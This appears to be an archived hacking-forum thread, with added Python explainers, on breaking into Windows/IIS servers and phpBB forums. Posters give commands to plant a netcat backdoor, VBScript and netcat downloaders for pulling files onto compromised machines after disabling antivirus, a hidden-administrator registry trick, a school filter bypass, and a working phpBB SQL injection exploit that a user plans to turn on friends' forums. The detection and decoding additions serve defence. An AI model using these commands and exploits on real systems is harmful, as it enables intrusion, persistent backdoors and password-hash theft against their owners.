Ok, you get the idea of what your browser looks like because you're experienced, but you are clueless about this pub crap. Now then you will need to start and run TFTP SERVER, making sure you aren't running any firewall because it will block your request. Now we will need to send the files through the TFTP Server to the host. And to do this you do something like
Now then you arent limited to just 1 dir to install this server to.. i like to hide mine in the c:\winnt\system but some people use the c:\intepub\scripts
So then you would copy the above line into Internet Explorer and hit Enter. Look at your TFTPSuitePro window and u should see it's uploading a file. NOTE: SOMETIMES you get an error msg; just refresh the page or.. copy into another window and try again. Remember sometimes you get this msg because the host can't connect properly to you..
Repeat for the following files:
SFIND.exe -------> used to scan for more.. servers
KILL.EXE -------> used to kill a task, very handy
TLIST.EXE -------> used to list all running processes or Task List
ncx99.exe -------> used to have as a backdoor remote trojan that runs on port 99
iis-scanner.EXE -------> great for scanning servers
servudaemon.ini -------> needed for servu
fxp crap, I hate it. anyway I think everybody in here knows about IIS hacking...
Apok^
Jun 2 2004, 01:58 PM
K, it has been a while, but I can remember this
some fun stuff to do in a lab:
shutdown -s -m \\[computer] (shuts down computer)
shutdown -a -m \\[computer] (aborts shutdown)
open a .txt file
type in this EXACTLY
----------------------
:a
net send [username....blabla, type net send /? for more] "message"
goto a
----------------------
rename the file to a .bat instead of .txt; it will net send them to death
globey
Jun 8 2004, 10:06 PM
by diablohorn
Tutorial on getting the stuff on a stro when the machine has got no TFTP or FTP.
Tutorial Written By: DiabloHorn
Comment: This is intended mostly for rehacking, sometimes for hacking new ones
Creditz: Kimatrix, www.google.com
COMMENT: This is mostly intended to only download wget.exe with it; don't try to download big things like serv-u
Index
0) Opening Words 1) The Netcat Way 2) .vbs script 3) Greetz
******************************************************************************** ************************** * 0) Opening Words * ******************************************************************************** ************************** Hmm what shall I say this time? O yeah I'm trying to improve my english hope you will read tut's of mine with perfect english on it pretty impossible but I'll try. Well about the tutorial you are about to read, this tutorial is ment for when you are on a machine you've got a shell but when typing the command tftp or ftp to get the files on it , it returns:
"ftp" Command not recognized or some similar error.
If that error sounds familiar then this tutorial might be for you. I say might because if telnet is also deactivated then, well, too bad. Hope you are all still awake, so read on and get started.
********************************************************************************
* 1) The Netcat Way *
********************************************************************************
Sub-Index
1) Purpose
2) Tools Needed
3) HowTo
1) Purpose
Using 2 netcats to retrieve a file
2) Tools Needed
- a Shell
- 2 Netcats
- File 2 Transfer
3) HowTo
Fire up netcat on your machine like this:
nc.exe -l -p 4455 -u -vvv < file.exe
When done fire up netcat on the hacked machine like this:
nc.exe -u host port > outputfile.exe
When this is done there will be a connection, but nothing will be sent until you send a character from your own machine to the hacked one, so just type something ("a" would be enough) and hit enter. Now the stupid part with this: you have no idea how long it will take, so I suggest you DON'T transfer Serv-U with this, but rather a thing like wget.exe, and then just download the stuff from the web. This is tested locally and remotely with normal access to the shell, so just tweak it until it works for you.
********************************************************************************
* 2) .vbs script *
********************************************************************************
1) Purpose
This is meant to make a .vbs executable script that downloads a file from the web. Similar to wget, but it doesn't need to be uploaded; it also works when tftp and ftp and net commands are disabled.
2) Tools Needed
- a Shell
- a commandline editor
- if no commandline editor available, the "echo" command
3) HowTo
First of all, make sure any anti-virus is disabled, because a .vbs file sometimes gets caught by antivirus programs.
First I'll discuss the commandline editor option then I'll discuss the echo option
' Everything except the two annotated lines is the standard MSXML + ADODB.Stream
' download pattern the posted fragment relies on; the fragment only kept those two lines.
Const adSaveCreateOverWrite = 2  ' ADO constant; undefined in a bare .vbs, so it must be declared
Set HTTPGET = CreateObject("Microsoft.XMLHTTP")
HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", False
' Change that to the place where your OWN .exe file is located
HTTPGET.Send
Set SendBinary = CreateObject("ADODB.Stream")
SendBinary.Type = 1               ' binary
SendBinary.Open
SendBinary.Write HTTPGET.ResponseBody
SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite
' Change that to the name of the .exe file you want to have and its location
When done typing the above, just save the file by pressing CTRL+Z. When the file is saved, just execute it like a normal .exe and wait till the file is downloaded.
REM Same script, written one line at a time with echo (get.vbs is just the name used here)
echo Const adSaveCreateOverWrite = 2 >> get.vbs
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >> get.vbs
echo HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", False >> get.vbs
REM Change that to the place where your OWN .exe file is located
echo HTTPGET.Send >> get.vbs
echo Set SendBinary = CreateObject("ADODB.Stream") >> get.vbs
echo SendBinary.Type = 1 >> get.vbs
echo SendBinary.Open >> get.vbs
echo SendBinary.Write HTTPGET.ResponseBody >> get.vbs
echo SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite >> get.vbs
REM Change that to the name of the .exe file you want to have and its location
When done, just execute like a normal .exe and wait till the file is downloaded.
********************************************************************************
* 3) Greetz *
********************************************************************************
To the wonderful world of the internet, and Kimatrix for helping me with testing the netcat things.
Hack it all, just don't break it all.
Also want to say thx to all the peeps on NFE who gave me a nice place to learn new things in a quick way and help other peeps out with my knowledge.
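As an added example, not code from the tutorial above: the two-netcat UDP transfer from section 1, with both ends reimplemented in Python and run in one process on 127.0.0.1 so the behaviour can be checked locally. It models the listener side as a UDP socket that has no peer until a first datagram arrives (which is why a character has to be typed before anything flows) and the receiving side as "collect until the line goes quiet", because UDP carries no end-of-file. The port is chosen at random instead of 4455, the payload is constructed, and the stall option is added only to show what that quiet-line guess does on a slow link.

```python
import socket
import threading
import time

# Added example; not part of the original post. Ports and payload are
# constructed for the demo.

CHUNK = 1024


def push_file(sock, data, stall_before_chunk=None, stall=0.0):
    """Stand-in for `nc -l -p PORT -u < file.exe`. A bound UDP socket has no
    peer until something arrives, so nothing is sent before the first
    datagram; then the whole file goes to whoever spoke first. The optional
    stall simulates a slow link part way through."""
    _, peer = sock.recvfrom(65535)          # the "a" typed on the other end
    for i, off in enumerate(range(0, len(data), CHUNK)):
        if stall_before_chunk == i:
            time.sleep(stall)
        try:
            sock.sendto(data[off:off + CHUNK], peer)
        except OSError:                     # receiver already gave up
            break
    sock.close()                            # UDP has no EOF to send


def pull_file(host, port, idle_timeout=1.0):
    """Stand-in for `nc -u host port > outputfile.exe`: send one trigger
    datagram, then append chunks until nothing arrives for idle_timeout
    seconds. That silence is the only completion signal available."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(idle_timeout)
    sock.sendto(b"a\n", (host, port))
    out = bytearray()
    while True:
        try:
            chunk, _ = sock.recvfrom(65535)
        except socket.timeout:
            break
        out += chunk
    sock.close()
    return bytes(out)


def transfer(data, stall_before_chunk=None, stall=0.0, idle_timeout=1.0):
    """Run both ends together; returns the bytes the receiver wrote."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    listener.bind(("127.0.0.1", 0))         # any free port instead of 4455
    port = listener.getsockname()[1]
    t = threading.Thread(target=push_file,
                         args=(listener, data, stall_before_chunk, stall))
    t.start()
    got = pull_file("127.0.0.1", port, idle_timeout)
    t.join()
    return got


if __name__ == "__main__":
    sample = bytes(range(256)) * 20         # constructed 5120-byte "file"
    print(len(transfer(sample)))            # whole file arrives
    # A 1.5 s pause before the third chunk beats the 1 s idle timeout: the
    # receiver closes its output after 2048 bytes and the rest is lost.
    print(len(transfer(sample, stall_before_chunk=2, stall=1.5)))
```

The stalled run is the point of the author's warning: the receiving nc cannot tell "slow" from "finished", so anything larger than a few kilobytes is better fetched over HTTP with wget once a small downloader is across.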
wambari
Jun 30 2004, 11:28 AM
Bypass school web content filter:
Most of these run on the school proxy server. Here's how to bypass; result: unlimited and unrestricted internet access, multimedia download, .exe's etc.
Step 1:
- Collect the external IP address of the school's DNS server (nothing a little social engineering can't solve).
- Get the internal IP address of the school proxy server (you can get this from the internet connection settings of your browser under proxy servers).
Step 2:
- Get admin privileges on the client (you need this to change IP settings on the machine).
Step 3:
- Edit the TCP/IP connection gateway of your LAN by getting into the advanced option and adding a default gateway; set this to the IP address of the proxy server obtained in Step 1 above.
Step 4:
- Under TCP/IP Properties again, set the Preferred DNS server to the external DNS IP obtained in Step 1.
Step 5:
- Remove the proxy settings on the browser by selecting the 'directly connected to internet' option.
Step 6:
- Fire up the browser and surf!
Enjoy.
wambari
IcedOut3E
Sep 4 2004, 04:03 AM
Maybe just a quick addition to the bypassing school filter.
Depending on how good the school's proxy is, you can usually just use a free proxy-based anonymous browsing site for any websites that block you out.
I know I did it when I was in school
My school used "Bess" proxy server.
Vort3x
Sep 4 2004, 08:44 PM
For those of you out there using the net user /add <user> <pass> thing to add accounts to XP machines (I say XP as I've only tested it on XP), this may help you somewhat. There is a reg key located at:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
If you add your newly created account as a DWORD with a value of 0 it hides the account.
example:
net user /add <user> <pass>
net localgroup /add Administrators <user>
echo REGEDIT4 >> user.reg
REM echo. writes the blank line the .reg format needs after the header and between sections
echo. >> user.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts] >> user.reg
echo. >> user.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] >> user.reg
echo "<user>"=dword:00000000 >> user.reg
echo. >> user.reg
regedit /s user.reg
del user.reg
would add a user <user> with the password <pass> to the system with admin rights; it would also hide the user from the user accounts manager.
Only tested on Windows XP Home/Pro SP0/SP1/SP2; I'm sure it would work for W2K and W2K3 though.
This is my first post so please excuse any errors etc.
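The check for the other side of that trick, added here and not part of the post above: read the SpecialAccounts\UserList key in the layout the post's user.reg uses (a `reg export` of the same key writes the same value lines under a "Windows Registry Editor Version 5.00" header, in UTF-16, so decode before parsing), list every account hidden with a DWORD of 0, and flag the ones that are also local administrators. The sample .reg text and the administrators list are constructed for the demo; the helper names are this example's own.

```python
import re

# Added detection example; not code from the post. SAMPLE_REG and the admin
# list are constructed stand-ins for `reg export` output and for the members
# of the local Administrators group.

USERLIST_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
                r"\Winlogon\SpecialAccounts\UserList")

SAMPLE_REG = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"HelpAssistant"=dword:00000000
"backup"=dword:00000000
"kiosk"=dword:00000001
"""


def hidden_accounts(reg_text):
    """Names under UserList whose DWORD is 0, i.e. hidden from the user
    accounts manager. Values under any other key are ignored, and the .reg
    DWORD is hex, so it is parsed as such."""
    hidden = []
    in_userlist = False
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_userlist = line.strip("[]").lower() == USERLIST_KEY.lower()
            continue
        m = re.match(r'"([^"]+)"=dword:([0-9a-fA-F]{8})$', line)
        if in_userlist and m and int(m.group(2), 16) == 0:
            hidden.append(m.group(1))
    return hidden


def hidden_admins(reg_text, local_admins):
    """Hidden accounts that also sit in Administrators: the exact artefact
    the post's script leaves behind. Windows account names are
    case-insensitive, so compare lower-cased."""
    admins = {a.lower() for a in local_admins}
    return [u for u in hidden_accounts(reg_text) if u.lower() in admins]


if __name__ == "__main__":
    # Constructed stand-in for the output of `net localgroup Administrators`.
    admins = ["Administrator", "backup"]
    print(hidden_accounts(SAMPLE_REG))          # ['HelpAssistant', 'backup']
    print(hidden_admins(SAMPLE_REG, admins))    # ['backup']
```

Any name that comes back from hidden_admins deserves a look at its creation time (the SAM and the Security event log) before it is removed; a hidden entry that is not an administrator may be one of the support accounts Windows itself lists there.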
[N0N4M3]
Oct 22 2004, 06:16 PM
I love this!!! Greetz for all and a big smack. Cordially, NoName
Toasty
Nov 9 2004, 03:44 AM
Hey all, forgive my n00bishness with all of this. (I've managed to get a few SQL injections made up, but that's about as far as I go.)
I've got 2 mates that I REALLY REALLY want to prank. They're both using phpNuke 7.4 and phpBB 2.0.6.
I've found these script things which seem to be really common, but I have no idea what to do with them...
QUOTE
#!/usr/bin/perl -w
use IO::Socket;
## PROOF-OF-CONCEPT
## * work only with mysql ver > 4.0
## * work only with post #1
##
## Example:
## C:\>r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2
## [~] prepare to connect...
## [+] connected
## [~] prepare to send data...
## [+] OK
## [~] wait for response...
## [+] MD5 Hash for user with id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99
##
if (@ARGV < 4) {
    print "\n\n";
    print "|****************************************************************|\n";
    print " r57phpbb.pl\n";
    print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n";
    print " by RusH security team // www.rsteam.ru , http://rst.void.ru\n";
    print " coded by f3sy1 & 1dt.w0lf // 16/12/2003\n";
    print " Usage: r57phpbb-poc.pl <server> <folder> <user_id> <search_id>\n";
    print " e.g.: r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2\n";
    print " [~] <server> - server ip\n";
    print " [~] <folder> - forum folder\n";
    print " [~] <user_id> - user id (2 default for phpBB admin)\n";
    print " [~] <search_id> - play with this value for results\n";
    print "|****************************************************************|\n";
    print "\n\n";
    exit(1);
}
$success = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
$search_id = $ARGV[3];
print "[~] prepare to connect...\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "socket error $!";
print "[+] connected\n";
print "[~] prepare to send data...\n";
# PROOF-OF-CONCEPT request. The two CHAR() lists spell out a serialized phpBB search
# array with user_password dropped into the split_search slot, so the hash comes back
# in the highlight= parameter of the result links.
print $socket "GET /$folder/search.php?search_id=$search_id%20union%20select%20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=$user_id/* HTTP/1.0\r\n\r\n";
print "[+] OK\n";
print "[~] wait for response...\n";
while ($answer = <$socket>) {
    if ($answer =~ /;highlight=/) {
        $success = 1;
        @result  = split(/;/, $answer);
        @result2 = split(/=/, $result[1]);
        $result2[1] =~ s/&/ /g;
        print "[+] MD5 Hash for user with id=$user_id is: $result2[1]\n";
    }
}
if ($success == 0) { print "[-] exploit failed =(\n"; }
## o---[ RusH security team | www.rsteam.ru | 2003 ]---o
Can somebody write me a "mini tutorial" on what I should be doing? Thanks!
bs_nbs
Nov 9 2004, 10:58 PM
Hey Toasty..
Seems you've put your hands on a Perl script which exploits a vuln in the search.php of phpBB forums..
First up, google "perl usage" so you get an idea of how to run the script.
The rest seems pretty obvious, as most scripts (and so does this one) include the usage..
print " Usage: r57phpbb-poc.pl <server> <folder> <user_id> <search_id>\n";
print " e.g.: r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2\n";
print " [~] <server> - server ip\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id (2 default for phpBB admin)\n";
print " [~] <search_id> - play with this value for results\n";
As seen above, the code you've pasted here should be saved in a *.pl file, which you would have found when googling.
What it does is open a connection on port 80 of the target, send some malformed code and print the MD5 hash of the user you requested... if everything went right, that is...
Toasty
Nov 9 2004, 11:20 PM
aaah ok thanks, yea I figured out saving it as a .pl file, but big sirens went off and my antivirus went nuts, so I figured better to ask before burrowing deeper. You've answered my question! Thanks!
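A walkthrough of what the posted script actually sends and reads back, as an added example that is not part of either post or of phpBB. It decodes the two CHAR() lists of the request into the serialized phpBB search array they spell out, shows where the user_password column lands (the one-element split_search list, which phpBB echoes into the highlight= parameter of every result link), pulls the hash out of a constructed response fragment the same way the script's /;highlight=/ match does, and shows the fix the bug calls for: search_id is a row number, so anything that is not a bare integer must be rejected before it reaches SQL. The search_id and user_id values are the 2 and 2 of the script's own usage line; the response fragment and the helper names are this example's.

```python
import re
from urllib.parse import unquote

# Added example; not code from the posts or from phpBB. The CHAR() lists are
# copied from the posted script with the line-wrap damage removed.

CHAR_BEFORE = (
    "97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,"
    "115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,"
    "116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,"
    "105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,"
    "99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34"
)
CHAR_AFTER = (
    "34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,"
    "115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,"
    "68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,"
    "117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,"
    "115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,"
    "105,58,50,48,48,59,125"
)
# The search_id query value as the script builds it for search_id=2, user_id=2.
POSTED_SEARCH_ID = (
    "2%20union%20select%20concat(char(" + CHAR_BEFORE + "),user_password,char("
    + CHAR_AFTER + "))%20from%20phpbb_users%20where%20user_id=2/*"
)


def decode_char_list(numbers):
    """MySQL CHAR(n1,n2,...) with these values is plain ASCII; rebuild it."""
    return "".join(chr(int(n)) for n in numbers.split(","))


def injected_search_array(raw_search_id):
    """The string the UNION SELECT makes the query return, with the selected
    column kept as a {placeholder} where the stored hash would go."""
    sql = unquote(raw_search_id)
    m = re.search(r"concat\(char\(([\d,]+)\),(\w+),char\(([\d,]+)\)\)", sql)
    if m is None:
        raise ValueError("not the CONCAT(CHAR(...),col,CHAR(...)) shape")
    return (decode_char_list(m.group(1)) + "{" + m.group(2) + "}"
            + decode_char_list(m.group(3)))


def split_search_slot(serialized):
    """(declared length, value) of split_search[0]: the search word phpBB
    puts into highlight=, which is the channel the script reads from."""
    m = re.search(r's:12:"split_search";a:1:\{i:0;s:(\d+):"([^"]*)"', serialized)
    return (int(m.group(1)), m.group(2)) if m else None


def extract_hash(response_text):
    """The script's /;highlight=/ match and splits, as a single regex."""
    m = re.search(r";highlight=([0-9a-f]{32})", response_text)
    return m.group(1) if m else None


def safe_search_id(raw):
    """The fix: accept only a bare integer for search_id, so the payload
    never reaches the query. Returns None for anything else."""
    return int(raw) if re.fullmatch(r"\d+", raw) else None


# Constructed fragment shaped like a phpBB 2 result link, carrying the hash
# from the script's own usage example (the MD5 of "password").
SAMPLE_RESPONSE = ('<a href="viewtopic.php?t=1&amp;highlight='
                   '5f4dcc3b5aa765d61d8327deb882cf99">')

if __name__ == "__main__":
    template = injected_search_array(POSTED_SEARCH_ID)
    print(template)
    print(split_search_slot(template))      # (32, '{user_password}')
    print(extract_hash(SAMPLE_RESPONSE))
    print(safe_search_id("2"), safe_search_id(POSTED_SEARCH_ID))
```

The declared length of 32 in the split_search slot is what makes this work against MD5 hashes specifically: the serialized string has to be self-consistent for phpBB to unserialize it, so the author sized the slot for a 32-character hex digest.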